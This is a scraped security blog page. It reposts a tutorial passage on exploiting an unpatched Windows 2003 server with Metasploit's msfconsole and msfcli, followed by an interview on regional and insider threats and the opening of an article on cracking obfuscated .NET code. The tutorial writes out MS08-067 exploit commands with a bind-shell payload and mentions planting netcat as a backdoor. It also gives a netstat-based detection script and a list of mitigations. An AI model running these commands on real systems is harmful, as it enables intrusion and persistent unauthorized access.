<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > exploit</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The moment we run this command, the exploit penetrates the remote computer and we get access to its command prompt. The output also shows which operating system is running on the target:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW10.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW10.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
From here, we can use the remote shell as needed, for instance to list a directory or to create and remove files, without being noticed by the actual user, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW11.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW11.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We have exploited port 445 of the target computer, so we can confirm the communication socket created on the target computer using the <em>netstat</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW12.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW12.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
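<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The <em>netstat</em> screenshot above is also what a defender would look at on the target. The following is an added example, not code from the original article or from Metasploit: a small Python parser for <em>netstat -ano</em> style output with two host-side checks that match what this walkthrough leaves behind, an established inbound SMB session on port 445 from a peer that is not an expected SMB client, and an established outbound connection to a watched listener port (a <em>reverse_tcp</em> payload connects back from the target to the attacker's listener, so it appears as an outbound session, not as a listener). The sample output is constructed for the example: 192.168.40.129 is the LHOST used above, 192.168.40.130 is an assumed address for the target, and 4444 is Metasploit's default LPORT.</div>

```python
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Optional

# Constructed sample output in the layout of Windows `netstat -ano`
# (Proto, Local Address, Foreign Address, State, PID). These rows are
# invented for this example: 192.168.40.129 is the LHOST from the
# walkthrough, 192.168.40.130 is an assumed target address, and 4444 is
# Metasploit's default LPORT for reverse_tcp payloads.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       836
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.40.130:445     192.168.40.129:49152   ESTABLISHED     4
  TCP    192.168.40.130:49870   192.168.40.129:4444    ESTABLISHED     1312
  TCP    192.168.40.130:49871   93.184.216.34:443      ESTABLISHED     2204
  UDP    0.0.0.0:500            *:*                                    1004
"""

# One netstat row. UDP rows carry no state column, so it is optional.
# The address groups split at the last colon, which also works for
# bracketed IPv6 addresses such as [::]:135.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?"
    r"(?P<pid>\d+)\s*$"
)


@dataclass(frozen=True)
class Connection:
    proto: str
    laddr: str
    lport: int
    raddr: str
    rport: Optional[int]   # None for a UDP "*:*" foreign address
    state: Optional[str]   # None for UDP rows
    pid: int


@dataclass(frozen=True)
class Finding:
    reason: str
    conn: Connection


def parse_netstat(text: str) -> List[Connection]:
    """Parse `netstat -ano` style output; header and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rport = m["rport"]
        conns.append(Connection(
            proto=m["proto"],
            laddr=m["laddr"],
            lport=int(m["lport"]),
            raddr=m["raddr"],
            rport=int(rport) if rport.isdigit() else None,
            state=m["state"],
            pid=int(m["pid"]),
        ))
    return conns


def find_suspicious(
    text: str,
    smb_allowlist: FrozenSet[str] = frozenset(),
    watch_ports: FrozenSet[int] = frozenset({4444}),
) -> List[Finding]:
    """Two host-side checks over parsed netstat output.

    1. An ESTABLISHED session on local port 445 (SMB) from a peer that is
       not in the allow-list of expected SMB clients.
    2. An ESTABLISHED outbound connection whose remote port is on the
       watch list (default: Metasploit's default reverse_tcp LPORT).
    Only TCP rows in ESTABLISHED state are considered.
    """
    findings = []
    for c in parse_netstat(text):
        if c.proto != "TCP" or c.state != "ESTABLISHED":
            continue
        if c.lport == 445 and c.raddr not in smb_allowlist:
            findings.append(Finding("inbound SMB session from unexpected peer", c))
        elif c.rport in watch_ports:
            findings.append(Finding("outbound connection to watched port", c))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_NETSTAT):
        print(f"PID {f.conn.pid}: {f.reason} "
              f"({f.conn.laddr}:{f.conn.lport} -> {f.conn.raddr}:{f.conn.rport})")
```

<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
On the constructed sample the script reports PID 4 (the SMB session from 192.168.40.129) and PID 1312 (the outbound session to port 4444); the HTTPS connection on PID 2204 is left alone. Passing the known SMB clients in <em>smb_allowlist</em> suppresses the first finding, and the PID column is what lets an analyst pivot to the owning process with the task list.</div>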
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 13pt;"><strong><em>Msfcli (Command Line)</em></strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
To open “<em>msfcli</em>”, go to <strong>Backtrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework | Msfcli</strong> or use the terminal to execute the following commands:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_830124" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
2</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># cd /pentest/exploits/framework3/</code></div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfconsole</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The <em>msfcli</em> has less functionality and is a bit more complex than <em>msfconsole</em>, but it can exploit the target in a single command line. The exploit names and options are the same as in the Metasploit console, but the <em>mode</em> values are unique to the CLI, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW13.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW13.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_92281" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<pre style="font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; margin: 0px;"><code class="plain"># ./msfcli exploit/windows/smb/ms08_067_netapi</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Here, we are using a slightly different exploit from the one used earlier in <em>msfconsole</em>, this time run through <em>msfcli</em>, in order to obtain a remote shell on the Windows server. Place the exploit name right after ./msfcli, followed by ‘O’, which lists the options for this exploit:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW14.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW14.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
By default, this exploit leaves the RHOST option blank, so set the remote computer's IP address with this command:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_279308" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<pre style="font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; margin: 0px;"><code class="plain"># ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.40.132 O</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now we have to configure the payload; placing ‘P’ after the IP address lists the payloads compatible with this exploit:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW15.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW15.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This time we choose the bind_tcp payload to get the remote shell; with a bind payload, the local computer's IP address does not have to be configured. Add the payload name and show its options with ‘O’ again:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_617531" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<pre style="font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; margin: 0px;"><code class="plain"># ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.40.132 PAYLOAD=windows/shell/bind_tcp O</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW16.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW16.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Here we don’t need to set any further options, so finally execute the exploit by placing ‘E’ after the payload name:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_79192" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<pre style="font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; margin: 0px;"><code class="plain"># ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.40.132 PAYLOAD=windows/shell/bind_tcp E</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
If the target's SMB service is vulnerable, the exploit executes successfully via Metasploit:<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW17.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW17.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We now have full access to the command shell of the target Windows 2003 server. Exploitation of such unpatched vulnerabilities puts a Windows 2003 server in severe danger, because the database server (SQL), mail server (SMTP), file server, FTP server and web server (IIS) are typically operated from it. An attacker is now able to perform any administrative operation and cause damage in any manner, such as deleting files and directories or planting unwanted software such as <em>netcat</em> as a backdoor to maintain future access, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW18.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW18.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Mitigation</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We have seen how easily an attacker can exploit an unpatched Windows 2003 vulnerability with Metasploit. Security personnel can protect the server from such attacks by ensuring the following configuration on the server side. Note that only the last item removes the vulnerability itself; the others limit exposure or detect the attempt:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Disable all redundant services</li>
<li>Always enable the host firewall and restrict SMB (TCP 445/139) to the hosts that need it</li>
<li>Configure IDS/IPS at the server side</li>
<li>Place critical resources (IIS, FTP server, database) in a DMZ</li>
<li>Anti-virus with an up-to-date signature database</li>
<li>Patch the operating system with the latest updates (for this attack, the MS08-067 security update)</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Synopsis</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This article demystified obtaining a remote shell by exploiting an unpatched Windows 2003 server vulnerability and taking complete control of the target, a task that would otherwise be complex and difficult. We have seen how Metasploit's <em>msfconsole</em> and <em>msfcli</em> simplify things by providing a consistent interface for exploits and letting you pair the payload of your choice with the chosen exploit. We walked through the main msfconsole commands and ran the exploitation from msfcli as well. (<em>msfcli</em> has since been removed from the framework; the same one-shot invocation is done today with <em>msfconsole -x</em>.)</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/" target="_blank">http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-59722741533629583392014-05-08T17:17:00.001-07:002014-05-08T17:17:22.386-07:00[infosecurity-magazine] World’s Most Advanced Hackers are in Russia and Eastern Europe<h2 class="article-intro" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 1.3em; font-weight: 400; line-height: 1.4em; margin: 0px 0px 14px;">
At Infosecurity Europe 2014, Eleanor Dallaway caught up with Ross Brewer, vice president and managing director for international markets, and Mike Reagan, CMO at LogRhythm to talk insider threats, and the global threat landscape…<a name='more'></a></h2>
<div class="article-content" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 12px;">
<div style="line-height: 1.4em; margin-bottom: 12px;">
As MD for international markets, <a href="https://www.logrhythm.com/" style="color: #e5141a; outline: none;" target="_blank">LogRhythm</a>’s Ross Brewer is well versed in the latest geographical trends and targets. “Germany is a big target at the moment”, he told <em>Infosecurity</em>. “It is a manufacturing country with amazing IP. It’s a country conscious of monitoring its population too much with a focus on employee privacy, and this is not lost on the hacking community.” German IP is therefore a target and tends to end up in Asia, according to Brewer.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
As an emerging market, the <a href="http://www.infosecurity-magazine.com/view/32611/arab-uprising-information-security-in-the-middle-east" style="color: #e5141a; outline: none;" target="_blank">Middle East</a> positioning itself as ‘the destination’ is also a target, Brewer said. “The biggest threat to Europe comes from Eastern countries where the most experienced, most capable hackers are. The most advanced hackers on the planet reside in Russia and Eastern Europe.” Threats from Asia tend to be less stealthy, however, Brewer declared. “So whilst the most obvious threat comes from Asia, the most real threat comes from East Europe.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
LogRhythm’s Brewer also flagged the French market as vulnerable, notably “because they buy all their technology from within France, but forget they’re plugged into a global internet which leaves them exposed.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Brewer also addressed Africa. “As technologies become more pervasive and wireless more common in Africa, there will be increased threat activity. At the moment, the African infrastructure is not on the same level as the rest of the world, with power and technology intermittent, but as that increases, so too will the threat”.<br />“Critical infrastructure is the target now, in every country”, Brewer told <em>Infosecurity</em>.</div>
<h4 style="font-size: 1em; line-height: 1.4em; margin: 0px;">
The Pervasive Insider Threat Problem</h4>
<div style="line-height: 1.4em; margin-bottom: 12px;">
A <a href="http://www.logrhythm.com/company/press-releases/uk-businesses-all-talk-on-insider-threats.aspx" style="color: #e5141a; outline: none;" target="_blank">recent survey</a> of 1000 IT professionals, conducted by OnePoll on behalf of LogRhythm, found 36% of IT professionals believe employees would access or steal confidential information, yet 38% do not have, or know of, any systems in place to stop employees accessing unauthorised data.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
In a corresponding survey of 200 employees, 47% admitted to having accessed or taken confidential information from the workplace. “In more than three quarters of these cases, they were not caught”, Reagan told <em>Infosecurity.</em> “And of the minority that were caught, there was no consequence or disciplinary action.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
What’s surprising about the results, said Reagan, “is the size of the visibility gap. There has been enough high-profile breach action for everyone to know that there is a big problem, there’s a growing abundance of information that shows what the problem is, so it’s baffling that the majority of organizations aren’t putting adequate systems in place.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The problem, agreed Brewer and Reagan, is the high-privileged access to data that organizations are giving people. “It’s not if you’ll be breached, but when. Those that aren’t taking action will be forced to by share-holders eventually.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The report results cite the insider threat as a bigger security risk (31%) than external threats (29%), yet the general consensus suggests that not enough importance is being placed on containing it, with 37% feeling like their business could do more to safeguard information from employees. “It will take legislation to drive this home. It could even take lives being cost before action is taken”, said Brewer.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Comparing the potential damage from the malicious insider threat versus the accidental, Brewer is clear that the deliberate threat is likely to be more catastrophic. “The accidental exposure of information is not used or deliberately targeted, so the consequences are less severe. Targeted crime is more concerning and causes more damage.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
<a href="http://www.infosecurity-magazine.com/view/38329/worlds-most-advanced-hackers-are-in-russia-and-eastern-europe-/" target="_blank">http://www.infosecurity-magazine.com/view/38329/worlds-most-advanced-hackers-are-in-russia-and-eastern-europe-/</a></div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-76929403687035538082014-05-05T18:28:00.000-07:002014-05-05T18:28:02.014-07:00[infosecinstitute] Encrypted Code Reverse Engineering: Bypassing Obfuscation<div class="post-content" style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div style="margin-bottom: 20px;">
<strong>Abstract</strong></div>
<div style="margin-bottom: 20px;">
Obfuscation is a hiding technique, often applied by software vendors, to harden the code they consider their intellectual property against reverse engineering. The transformation replaces the program's symbols and structure (for .NET, its compiled IL and metadata) with an opaque, byzantine form that has the same computational effect as the original program. With effective obfuscation in place it is hard for a malicious reverser to analyze the software or subvert its functionality for his own ends. Vendors tend to assume their intellectual property is therefore safe, but unfortunately<em>, software code is not safe from modification even after obfuscation; it can still be cracked</em>. This article illustrates that by walking through the tactics used to bypass the obfuscation and reverse engineer or alter the inherent functionality of the software.</div>
<a name='more'></a><br />
<div style="margin-bottom: 20px;">
<strong>Essentials</strong></div>
<div style="margin-bottom: 20px;">
Software de-obfuscation is one of the more complex undertakings in reverse engineering and goes through several phases. First, the researcher needs a thorough understanding of coding for the .NET CLR, because we shall reverse engineer a .NET application whose code is already protected. The researcher must also know how code is obfuscated and have a good command of IL assembly language in order to alter the .NET binary's instructions as needed. The following list outlines what must be available on the researcher's machine:</div>
<ul>
<li>Visual Studio 2010 or later</li>
<li>Reflector or ILSPY</li>
<li>Reflexil (Add-on)</li>
<li>CodeSearch (Add-on)</li>
<li>Working knowledge of IL assembly language</li>
</ul>
<div style="margin-bottom: 20px;">
<strong>Obfuscation Analysis</strong></div>
<div style="margin-bottom: 20px;">
